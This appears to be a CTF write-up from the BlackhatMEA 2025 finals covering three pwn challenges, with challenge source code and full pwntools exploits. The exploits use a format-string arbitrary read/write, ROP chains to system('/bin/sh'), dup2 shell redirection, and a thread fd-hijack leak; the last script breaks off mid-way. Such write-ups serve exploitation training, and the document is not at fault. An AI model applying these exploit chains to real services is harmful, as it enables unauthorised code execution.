Featured image of post blackhatMEA_finals_WP

blackhatMEA_finals_WP

BlackhatMEA2025 CTF FINALS forensics and pwn section

Last updated on:
|
|
|

day1

pwn

verifmt

a powerful verifier bro,that’s the Verifmt

analysis

All protections enabled, glibc2.39 environment, the challenge provided source code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int verify_fmt(const char *fmt, size_t n_args) {
  size_t argcnt = 0;
  size_t len = strlen(fmt);

  for (size_t i = 0; i < len; i++) {
    if (fmt[i] == '%') {
      if (fmt[i+1] == '%') {
        i++;
        continue;
      }

      if (isdigit(fmt[i+1])) {
        puts("[-] Positional argument not supported");
        return 1;
      }

      if (argcnt >= n_args) {
        printf("[-] Cannot use more than %lu specifiers\n", n_args);
        return 1;
      }

      argcnt++;
    }
  }

  return 0;
}

int main() {
  size_t n_args;
  long args[4];
  char fmt[256];

  setbuf(stdin, NULL);
  setbuf(stdout, NULL);

  while (1) {
    /* Get arguments */
    printf("# of args: ");
    if (scanf("%lu", &n_args) != 1) {
      return 1;
    }

    if (n_args > 4) {
      puts("[-] Maximum of 4 arguments supported");
      continue;
    }

    memset(args, 0, sizeof(args));
    for (size_t i = 0; i < n_args; i++) {
      printf("args[%lu]: ", i);
      if (scanf("%ld", args + i) != 1) {
        return 1;
      }
    }

    /* Get format string */
    while (getchar() != '\n');
    printf("Format string: ");
    if (fgets(fmt, sizeof(fmt), stdin) == NULL) {
      return 1;
    }

    /* Verify format string */
    if (verify_fmt(fmt, n_args)) {
      continue;
    }

    /* Enjoy! */
    printf(fmt, args[0], args[1], args[2], args[3]);
  }

  return 0;
}

% followed by a number will directly error, but according to

If the number of format strings we give exceeds the limit of 4, it will exit directly. So we need to use * to increase the offset, and because it is unsigned, we cannot leak forward.

* is a placeholder for extracting parameters. Using a reasonable payload, we can legitimately occupy the args parameters while still ensuring that the number of % and read parameters remains within the limit.

For leaking addresses, refer to 🚀’s blog
Finally, the program will split and print the content of the format string, up to 4. You can inject \0 character to bypass the verification, then use hhn to overwrite \0. The problem is that if you only use %* to pop parameters, our later r9 r10 registers are nil, and the limit on the number of format strings will also make the leaked address nil. Therefore, we need %*c to occupy 6 parameters, so that our last %p can print the stack address pointer. Based on this, we can write the writing function write_byte(addr,val):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def send_payload(n_args, args_list, fmt_str):
    io.sendlineafter(b"# of args: ", str(n_args).encode())
    # 填充 args 数组
    for i in range(n_args):
        io.sendlineafter(f"args[{i}]: ".encode(), str(args_list[i]).encode())
    io.sendlineafter(b"Format string: ", fmt_str)

def write_byte(addr, val):
    """
    使用 %*c%hhn 写入 1 字节
    args[0] = 写入值 (width)
    args[1] = 0 (char)
    args[2] = 目标地址 (pointer)
    """
    # 如果要写入 0x00,必须输出 0x100 (256) 个字符,%hhn 截断为 0x00 from小伞
    if val == 0:
        val = 256

    # args[0] = width/value, args[1] = char, args[2] = pointer
    args_write = [val, 0, addr, 0]

    # 构造 Payload: %*c 消耗 args[0], args[1]; %hhn 消耗 args[2]
    # n_args=3 或 4 均可 (我们用 4)
    send_payload(4, args_write, b"%*c%hhn")

Finally, when writing, we use the leaked stack pointer to point to the return address for writing. Since there is a while loop, we have enough write opportunities; we just need to write one byte at a time to the address.

exp

I don’t know why the local docker can’t connect, even though the libc is pulled from the container.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
import argparse
import sys

from pwn import *

parser = argparse.ArgumentParser()
parser.add_argument(
    "mode",
    type=int,
    choices=[0, 1, 2],
    nargs="?",
    default=0,
    help="0=local,1=local+gdb,2=remote",
)
args = parser.parse_args()

filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"
remote_addr = "localhost"
remote_port = "13337"


context(log_level="debug", os="linux", arch=arch)  
if args.mode < 2:
    context.terminal = ["tmux", "splitw", "-h"]

def VIO_TEXT(x, code=95):
    return log.info(f"\x1b[{code}m{x}\x1b[0m")

def CLEAR_TEXT(x, code=32):
    return log.success(f"\x1b[{code}m{x}\x1b[0m")

if args.mode == 0:
    io = process(filename)
    print(CLEAR_TEXT("[*] Running on local machine"))
elif args.mode == 1:
    io = process(filename)
    gdb.attach(
        io,
        gdbscript="""
        """,
    )
elif args.mode == 2:
    io = remote(remote_addr, remote_port)
else:
    sys.exit(1)
elf = ELF(filename, checksec=False)
if libc_name:
    libc = ELF(libc_name, checksec=False)
else:
    libc=elf.libc


def send_payload(n_args, args_list, fmt_str):
    io.sendlineafter(b"# of args: ", str(n_args).encode())
    # 填充 args 数组
    for i in range(n_args):
        io.sendlineafter(f"args[{i}]: ".encode(), str(args_list[i]).encode())
    io.sendlineafter(b"Format string: ", fmt_str)


def write_byte(addr, val):
    """
    使用 %*c%hhn 写入 1 字节
    args[0] = 写入值 (width)
    args[1] = 0 (char)
    args[2] = 目标地址 (pointer)
    """
    # 如果要写入 0x00,必须输出 0x100 (256) 个字符,%hhn 截断为 0x00 from小伞
    if val == 0:
        val = 256

    # args[0] = width/value, args[1] = char, args[2] = pointer
    args_write = [val, 0, addr, 0]

    # 构造 Payload: %*c 消耗 args[0], args[1]; %hhn 消耗 args[2]
    # n_args=3 或 4 均可 (我们用 4)
    send_payload(4, args_write, b"%*c%hhn")


# Leak Addresses libc and PIE
VIO_TEXT("Sending payload to leak addresses...")

# 1. Leak Stack Address (使用 3个 %*c 跳过 Nil from RocketMadev blog)
# 预期打印 Arg 7 ([RSP+16] 或附近)
args_leak_stack = [3, 0, 0, 0]
fmt_stack = b"AAAA%*c%*c%*c%p"
send_payload(4, args_leak_stack, fmt_stack)
io.recvuntil(b"AAAA")
io.recvuntil(b"0x")
stack_leak = int(io.recvline().strip(), 16)
CLEAR_TEXT(f"Leaked stack address: {hex(stack_leak)}")

# Arb Read
store_pie_addr = stack_leak - 0x20
args_leak_pie = [0, 0, store_pie_addr, 0]
payload_pie = b"B%*c%sEND"
send_payload(4, args_leak_pie, payload_pie)
io.recvuntil(b"B")
raw_leak_pie = io.recvuntil(b"END", drop=True)
raw_leak_pie = raw_leak_pie.lstrip(b"\x00").strip()
raw_leak_pie = u64(raw_leak_pie[:7].ljust(8, b"\x00"))
pie_base = raw_leak_pie - 0x12F6
CLEAR_TEXT(f"Calculated PIE base address: {hex(pie_base)}")

# Leak Libc 
store_libc_addr = stack_leak + 0x170
args_leak_libc = [0, 0, store_libc_addr, 0]
payload_libc = b"B%*c%sEND"
send_payload(4, args_leak_libc, payload_libc)
io.recvuntil(b"B")
raw_leak_libc = io.recvuntil(b"END", drop=True)
raw_leak_libc = raw_leak_libc.lstrip(b"\x00").strip()
raw_leak_libc = u64(raw_leak_libc[:7].ljust(8, b"\x00"))
pause()
libc_base = (
    raw_leak_libc - 0x2718a 
)  # __libc_start_call_main+122 的偏移,要微调一下
CLEAR_TEXT(f"Calculated Libc base address: {hex(libc_base)}")

# ROP payload
VIO_TEXT("Constructing ROP chain...")

# 计算返回地址位置
OFFSET_TO_RET = 0x170
ret_addr_ptr = stack_leak + OFFSET_TO_RET
CLEAR_TEXT(f"ROP Chain Start Ptr: {hex(ret_addr_ptr)}")

pop_rdi_ret = pie_base + 0x1282
CLEAR_TEXT(f"pop rdi; ret address: {hex(pop_rdi_ret)}")

bin_sh_addr = libc_base + 0x0000000000196031
CLEAR_TEXT(f"/bin/sh address: {hex(bin_sh_addr)}")
system_addr = libc_base + 0x4C330
exit_addr = libc_base + libc.sym["exit"] 
ret_addr = pie_base + 0x101A
CLEAR_TEXT(f"system address: {hex(system_addr)}")
ROP_CHAIN = [
    pop_rdi_ret,  
    bin_sh_addr,  
    ret_addr,
    system_addr,
]
VIO_TEXT("Writing ROP Chain byte-by-byte...")

current_write_ptr = ret_addr_ptr

for addr in ROP_CHAIN:
    for i in range(8):
        byte_to_write = (addr >> (8 * i)) & 0xFF  # 对齐用

        # 写入
        write_byte(current_write_ptr + i, byte_to_write)

    # 移动到下一个地址的起始点
    current_write_ptr += 8

CLEAR_TEXT("ROP Chain written successfully.")

VIO_TEXT("Triggering the overwritten return address...")

# pause()
# 发送非数字字符,使 scanf 失败,main 函数 return,触发 ROP 链
io.sendlineafter(b"# of args: ", b"#")

io.interactive()

StackPrelude

A prelude, ready to meet the impossible stack overflow challenge

analysis

Analyze the source code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#define _GNU_SOURCE 
#include <stdio.h>      // 标准输入/输出库,用于 perror
#include <stdlib.h>     // 标准库,用于 atoi
#include <netinet/in.h> // 包含 sockaddr_in 结构体和 IP 宏定义
#include <sys/socket.h> // 包含 socket, bind, listen, accept 等函数
#include <sys/types.h>  // 包含基本系统数据类型
#include <unistd.h>     // 包含 close 函数

int main(int argc, char **argv) {
    // 客户端地址结构体 (cli) 和服务器地址结构体 (addr),用 {0} 初始化为零
    struct sockaddr_in cli, addr = {0}; 
    socklen_t clen;         // 客户端地址结构体的长度
    int cfd;                // 客户端文件描述符 (Client File Descriptor)
    int sfd = -1;           // 服务器文件描述符 (Server File Descriptor),-1 表示未初始化或失败
    int yes = 1;            // 用于 setsockopt() 设置选项的值 (开启)
    ssize_t n;              // 用于存储接收数据的长度或 recv/send 的返回值
    char buf[0x100];        // 栈缓冲区,大小为 256 字节 (0x100),用于存放客户端发送的数据
    // 解析命令行参数:如果没有参数,默认端口 31337;否则使用第一个参数作为端口号
    unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

    // 1. 创建 Socket
    // AF_INET: IPv4 地址族;SOCK_STREAM: TCP 协议(流式套接字);0: 默认协议
    if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket"); // 输出错误信息
        goto err;
    }

    // 2. 设置 Socket 选项:地址复用
    // SOL_SOCKET: 套接字级别选项;SO_REUSEADDR: 允许重用本地地址,避免 TIME_WAIT 状态导致绑定失败
    // 即使前一个进程在端口上留下了 TIME_WAIT 状态的连接,新进程也能立即启动并重新绑定到该端口,极大地提高了服务器的重启效率。
    if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
        perror("setsockopt(SO_REUSEADDR)");
        goto err;
    }

    // 3. 填充服务器地址结构体
    addr.sin_family = AF_INET;
    // htonl(): 主机字节序转网络字节序 (32位),INADDR_ANY: 监听本机所有网络接口 (0.0.0.0)
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    // htons(): 主机字节序转网络字节序 (16位),设置监听端口
    addr.sin_port = htons(port);

    // 4. 绑定 IP 地址和端口到 Socket
    if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
        perror("bind");
        goto err;
    }

    // 5. 开始监听连接
    // 将 Socket 设为被动模式,准备接受连接;backlog 参数为 1 (等待连接队列的最大长度)
    if (listen(sfd, 1) < 0) {
        perror("listen");
        goto err;
    }

    // 6. 接受客户端连接
    clen = sizeof(cli);
    // 阻塞等待客户端连接。连接成功后,返回新的文件描述符 cfd 用于通信
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
        perror("accept");
        goto err;
    }

    // 7. 进入数据处理循环 (Echo Loop)
    while (1) {
        n = 0;
        // 第一阶段接收:接收数据长度 (ssize_t,通常是 8 字节)
        // MSG_WAITALL: 确保接收到指定字节数 (sizeof(ssize_t)) 后才返回
        recv(cfd, &n, sizeof(ssize_t), MSG_WAITALL);
        
        // 退出条件:
        // n <= 0: 客户端断开连接或发送无效长度
        // n >= 0x200 (512): 长度超限,但注意:
        if (n <= 0 || n >= 0x200) 
            break;

        // 第二阶段接收:根据 n 的大小接收数据到缓冲区 buf
        // MSG_WAITALL: 确保接收到 n 个字节后才返回
        recv(cfd, buf, n, MSG_WAITALL);
        
        send(cfd, buf, n, 0); 
    }

    return 0;

err:
    // 错误处理标签:如果程序在任一阶段失败,跳转到这里
    if (sfd >= 0) close(sfd); // 如果 sfd 已经创建成功,则关闭它
    return 1; 
}

The key to this problem is how to allow the remote to continue interacting while being able to leak a large amount of data. The socket server built here can only handle one request at a time. The server will send back the data after receiving it. Let’s briefly look at Computer Networks The first idea is to use the half-close feature of the TCP protocol. During the four-way handshake, we first send a client-side half-close FIN packet. At this point, the connection is not normally closed, causing the server to return 0 due to MSG_WAITALL and close the cfd. However, under this condition, we would need to close the input packet, and even if we can leak data, we cannot continue interacting. So this approach is a pass The second idea is to use interrupt signals. Use OOB (OUT-OF-BAND), when send use urgent byte to trigger the SIGURG signal on the server side. Since this is an asynchronous signal, it will interrupt the recv function, and send will still return data of the same length, and we can still continue interacting!

Interaction and exp

First, let’s talk about how to interact and debug the challenge.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
parser.add_argument(
    "mode", type=int, choices=[0, 1, 2], nargs="?", default=0,
    help="0=local, 1=local+gdb, 2=remote. (Default: 0)",
)

parser.add_argument(
    "-T", "--threads", type=int, default=None, 
    help="Thread count for remote connections (Overrides 'mode')."
)
args = parser.parse_args()
#...
def launch():
    global io, threads
    process_argv=[filename,str(remote_port)]

    # 优先处理多线程模式 (如果 -T 被设置)
    if args.threads is not None:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        
        threads = [remote(remote_addr, remote_port, ssl=False) for _ in range(args.threads)]
        CLEAR_TEXT(f"[*] Started {args.threads} remote threads on {remote_addr}:{remote_port}")
        return threads

    elif args.mode == 0:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine (mode 0)")
        return io
        
    elif args.mode == 1:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine with GDB (mode 1)")
        gdb.attach(io, gdbscript="""
        """)
        return io
        
    elif args.mode == 2:
        io = remote(remote_addr, remote_port)
        CLEAR_TEXT(f"[*] Running on remote: {remote_addr}:{remote_port} (mode 2)")
        return io
    else:
        sys.exit(1)

#...

if __name__ == "__main__":
    target = launch()
    
    # 判断是否为多线程模式
    if args.threads is not None:
        threads = target
        VIO_TEXT("--- Multi-Threaded Exploit Mode Active ---")
        if threads:
            VIO_TEXT("Entering interactive mode on the first thread for manual control...")
            main(threads)
    else:
        io = target
        VIO_TEXT("--- Single Connection Exploit Mode Active ---")
        
        io.interactive()

The above is my script. When debugging locally, first open the program and pwndbg, establish an io, then open a new process for connection and interaction.

1
2
python exp_thread.py 1 
python exp_thread.py -T 1

Then we can interact on the interface opened by pwndbg.

The specific situation is as shown. After debugging, after we send data and open recv, in the second step we can find the following situation:
The socket uses fd 4 as a fixed interaction handle. If we want to have normal interaction with the target machine after opening a shell, we need to try using dup2 to duplicate the interaction fd handle to stdout (or other stdin, stderr), otherwise there will be no echo, and the system("/bin/sh") performed will directly

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
import argparse
import sys
from pwn import *
# --------------------------
# 1. 命令行参数定义
# --------------------------
parser = argparse.ArgumentParser(description="Pwn Exploit Script with multi-mode and multi-thread support.")

parser.add_argument(
    "mode", type=int, choices=[0, 1, 2], nargs="?", default=0,
    help="0=local, 1=local+gdb, 2=remote. (Default: 0)",
)
parser.add_argument(
    "-T", "--threads", type=int, default=None, 
    help="Thread count for remote connections (Overrides 'mode')."
)
args = parser.parse_args()

# --- 配置信息 ---
filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"
remote_addr = "172.23.0.2" #NOTE:这里要注意不能用docker的回环地址 
remote_port = 5000 
# remote_addr = "localhost" 
# remote_port = 13337

context(log_level="info", os="linux", arch=arch)

# 仅在 local/gdb 模式下,且没有使用线程模式时设置 terminal
if args.mode < 2 and args.threads is None:
    context.terminal = ["tmux", "splitw", "-h"]

elf = ELF(filename, checksec=False)
if libc_name:
    libc = ELF(libc_name, checksec=False)

def VIO_TEXT(x, code=95):
    return log.info(f"\x1b[{code}m{x}\x1b[0m")

def CLEAR_TEXT(x, code=32):
    return log.success(f"\x1b[{code}m{x}\x1b[0m")

def launch():
    global io, threads
    process_argv=[filename,str(remote_port)]

    # 优先处理多线程模式 (如果 -T 被设置)
    if args.threads is not None:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        
        threads = [remote(remote_addr, remote_port, ssl=False) for _ in range(args.threads)]
        CLEAR_TEXT(f"[*] Started {args.threads} remote threads on {remote_addr}:{remote_port}")
        return threads

    elif args.mode == 0:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine (mode 0)")
        return io
        
    elif args.mode == 1:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine with GDB (mode 1)")
        gdb.attach(io, gdbscript="""
        """)
        return io
        
    elif args.mode == 2:
        io = remote(remote_addr, remote_port,ssl=False)
        CLEAR_TEXT(f"[*] Running on remote: {remote_addr}:{remote_port} (mode 2)")
        return io
    else:
        sys.exit(1)

# 先python 1启动一个终端进行开启进程和gdb调试,然后再在另一个终端进行数据交互
def main(threads):
    t0:tube
    # 使用第一个线程进行交互泄漏和攻击 
    t0 = threads[0]
    t0.sendline(flat(0x180))
    t0.sock.send(b"A" * 2, constants.MSG_OOB)
    # or 
    # with sock.out_of_band():
    #     sock.send(b"A" * 2)
    data=t0.recv()

    canary=int.from_bytes(data[0x108:0x110],"little")
    libc.address=int.from_bytes(data[0x118:0x120],"little")-0x2a1ca
    
    CLEAR_TEXT(f"[*] Leaked Canary: {hex(canary)}")
    CLEAR_TEXT(f"[*] Leaked Libc Base: {hex(libc.address)}")

    t0.sendline(flat(0x188))

    VIO_TEXT("[*] Sending ROP payload...")
    pop_rdi_ret=libc.address+0x000000000010f78b
    pop_rsi_ret=libc.address+0x0000000000110a7d
    ret_addr=libc.address+0x000000000002882f
    payload=flat({
        0x108-1:canary,
        0x118-1:pop_rdi_ret,
        0x120-1:4, #fd 
        0x128-1:pop_rsi_ret, # 0
        0x138-1:libc.sym['dup2'],
        0x140-1:pop_rdi_ret,
        0x148-1:4,
        0x150-1:pop_rsi_ret,
        0x158-1:1,
        0x160-1:libc.sym['dup2'],
        0x168-1:ret_addr, 
        0x170-1:pop_rdi_ret,
        0x178-1:libc.search(b"/bin/sh\x00").__next__(),
        0x180-1:libc.sym['system'],
    },filler=b"\x00").ljust(0x188,b"\x00")
    t0.send(payload)
    t0.sendline(p64(0))
    t0.interactive()

if __name__ == "__main__":
    target = launch()
    
    # 判断是否为多线程模式
    if args.threads is not None:
        threads = target
        VIO_TEXT("--- Multi-Threaded Exploit Mode Active ---")
        if threads:
            VIO_TEXT("Entering interactive mode on the first thread for manual control...")
            main(threads)
    else:
        io = target
        VIO_TEXT("--- Single Connection Exploit Mode Active ---")
        main([io])  # Wrap io in a list to match the threads parameter
        io.interactive()

tips:

It should be noted that when we want to interact with the docker target machine, we cannot use the loopback address lo, but must use the local mapped docker internal network IP. The reason is that when using OOB, docker does two things when mapping ports:

  • Set iptables rules: Direct traffic from the host port to the Docker bridge network.
  • Start docker-proxy process: docker-proxy or similar components (such as userland-proxy) run on the host, listening on the host port and forwarding traffic to the container’s internal IP and port. If we start the loopback address lo, the kernel will find that the target address is 127.0.0.1, which may optimize TCP frames, skip checksums, etc. The data will not go through the normal application -> transport -> network -> link layer, but will be captured at the network layer. docker-proxy, when processing loopback traffic, will not fully maintain TCP frames and flags, thus causing the OOB attack to fail when setting the URG pointer due to optimization of TCP frame flags, and failing to trigger the recv interrupt and leak data. Therefore, we must use the Docker bridge network interface.

day2

pwn

Stack_Impromptu

The world impossible is not in my dictionary

analysis

All protections enabled. First, audit the source code. main.cpp:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <pthread.h>

void fatal(const char *msg) {
  perror(msg);
  pthread_exit(NULL);
}

int server_read(int &fd){
  size_t size;
  char buf[0x40];

  memset(buf, 0, sizeof(buf));
  if (read(fd, &size, sizeof(size)) != sizeof(size)
      || size > 0x100
      || read(fd, buf, size) < size)
    goto err;

  write(fd, buf, size);
  return 0;

err:
  close(fd);
  fatal("Could not receive data (read)");
  return 1;
}

void* server_main(void* arg) {
  int fd = (int)((intptr_t)arg);
  while (server_read(fd) == 0);
  return NULL;
}

int main(int argc, char** argv) {
  pthread_t th;
  struct sockaddr_in cli, addr = { 0 };
  socklen_t clen;
  int cfd, sfd = -1, yes = 1;
  unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

  if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("socket");
    goto err;
  }

  if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
    perror("setsockopt(SO_REUSEADDR)");
    goto err;
  }

  addr.sin_family = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  addr.sin_port = htons(port);

  if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
    perror("bind");
    goto err;
  }

  if (listen(sfd, 5) < 0) {
    perror("listen");
    goto err;
  }

  while (1) {
    clen = sizeof(cli);
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
      perror("accept");
      goto err;
    }

    pthread_create(&th, NULL, server_main, (void*)((intptr_t)cfd));
    pthread_detach(th);
  }

  return 0;

err:
  if (sfd >= 0) close(sfd);
  return 1;
}

When a new connection cfd is created, it will normally call pthread_create, and after use, reclaim it with pthread_detach. Obviously, this is a multi-threaded challenge. We cannot directly attempt to leak any memory content in one thread. The key lies in server_main and server_read.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int server_read(int &fd){
  size_t size;
  char buf[0x40];

  memset(buf, 0, sizeof(buf));
  if (read(fd, &size, sizeof(size)) != sizeof(size)
      || size > 0x100
      || read(fd, buf, size) < size)
    goto err;

  write(fd, buf, size);
  return 0;

err:
  close(fd);
  fatal("Could not receive data (read)");
  return 1;
}

void* server_main(void* arg) {
  int fd = (int)((intptr_t)arg);
  while (server_read(fd) == 0);
  return NULL;
}

server_read has a stack overflow and will be called continuously, but unlike the previous problem, this one does not have MSG_WAITALL to allow us to use interrupt signals to leak information.

Pthread multi-threading: all threads run in the same process space and share global variables, heap space, file descriptors. Each thread only has its own independent stack!

Pthread has vulnerabilities. Due to memory sharing, an overflow in one thread can tamper with data of other threads, leading to control of the entire process or a crash. During the competition, I had no idea for this problem. Strict requirements on input format and data size made it unclear how to achieve a leak. AI only suggested trying to use data to overwrite memory space of other threads, and multi-thread debugging is not simple, mainly considering interaction timing issues. Fortunately, after the competition, I saw a hint from a master in Discord who solved it:
So how exactly to swap fd…? —>We have pthread, right? If we can overwrite the fd of a specific thread through multi-threading, achieving fd hijacking, can we then copy fd and redirect output, finally leaking memory information?

fd hijack

Let’s first try using two threads to see if we can indeed hijack fd. Create two threads.

Check the stack bottom in thread stack 2. The actual space is as shown above; we have plenty of space to overwrite fd.

Since the extracted qword pointer at [rbp-0x68] is resolved to the stored fd, we actually need to write 0 at offset 0x7c to finally overwrite fd.
Thus, when close is called, it actually closes the fd of process 1.

Bypassing blocking

Since we actually closed thread 2, when allocating again, it still allocates to thread 2’s fd, not reusing 4. Therefore, before attempting to leak data, we must create 4 threads, so that eventually two threads reuse fd.

Leak

Here we need to use a TCP reset attack method. Since we obtain fd=4 again, but the originally created thread is still not closed, it will directly send an RST packet to the peer to force close the connection. At that moment, the fourth thread will take over fd=4 again (very short time), effectively achieving:

TCP_RST
TCP connection recovery. At this point, for the server that established the connection, it recovers the first thread’s connection, and because we overwrote thread 4’s fd=1, it sends stack data to thread 4’s fd=1, thus achieving a leak.

ROP

After that, how to exploit the overflow for ROP and how to interact? The idea is similar to above:

  1. Create threads, use overwrite to close one fd.
  2. Create threads again, now we can get the needed fd and corresponding thread control.
  3. Interact via standard input/output, thus we basically obtain a remote shell.

exp

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
import argparse
import socket
import struct
import time
import sys
from pwn import *

parser = argparse.ArgumentParser(description="Sequential start_conion Exploit")
parser.add_argument(
  "mode",
  choices=["0", "1", "2", "t"],
  nargs="?",
  default="0",
  help="0=local, 1=local+gdb, 2=remote, t=direct process (default:0)",
)
args = parser.parse_args()

filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"

def VIO_TEXT(x, code=95):
  return log.info(f"\x1b[{code}m{x}\x1b[0m")

def CLEAR_TEXT(x, code=32):
  return log.success(f"\x1b[{code}m{x}\x1b[0m")

def stop(msg="PAUSE", code=91):
    prompt = f"\n\x1b[1;{code}m{msg}\x1b[0m"
    try:
        return raw_input(prompt)
    except EOFError:
        print("") 
        pass

context(log_level="info", os="linux", arch=arch)
if args.mode == "1":
  context.terminal = ["tmux", "splitw", "-h"]

elf = ELF(filename, checksec=False)
if libc_name:
  libc = ELF(libc_name, checksec=False)

def start_con():
  if args.mode in ["0", "t"]:
    return remote("127.0.0.1", 31337)
  else:
    return remote("172.20.0.2", 5000)

def main():
  server_proc = None
  if args.mode in ["1"]:
    server_proc = process(filename)
    # gdb.attach(server_proc, gdbscript="""
    # set follow-fork-mode parent
    # b *(main+428)
    # c
    # """)
    time.sleep(1) # 等待服务端绑定端口
    server_proc.interactive()
    return

  ("--- Starting Sequential Exploit ---")

  # 1. 建立连接并制造竞态/溢出环境
  # [s1] fd=4: 发送长度头,然后挂起
  s1 = start_con()
  time.sleep(0.1)
 
  # [s2] fd=5: 准备覆盖
  s2 = start_con()
 
  VIO_TEXT("Sending size header to s1...")
  s1.send(p64(0x100))
  time.sleep(0.25) # 必须等待,确保 s1 的线程进入 read(fd, buf, size) 状态

  VIO_TEXT("Sending payload via s2...")
  s2.send(p64(0x100)) 
  # s2 发送 payload 覆盖s1的fd
  s2.send(b"\x00" * 0x7C + p32(4))
  time.sleep(0.5)
  # stop("send data from s2")

  # 由于socket的分配机制,这里实际分配到的仍然是供给s2的fd,但是不是4,作为缓冲
  s3 = start_con()
  time.sleep(0.1)
  # stop("get a new fd")
 
  # fd=4 被重用: 用来接收 Leak
  s4 = start_con()
  time.sleep(0.1)

  VIO_TEXT("Triggering leak via s4...")
  s4.send(p64(0x100))
  s4.send(b"\x00" * 0x7C + p32(1))
  time.sleep(0.25)

  # 2. 触发 RST 以激活漏洞/错误路径
  # 这里设置SOLSOCKET为SO_LINGER 并关闭 s1,会导致发送 RST 包
  # l_onoff = 1
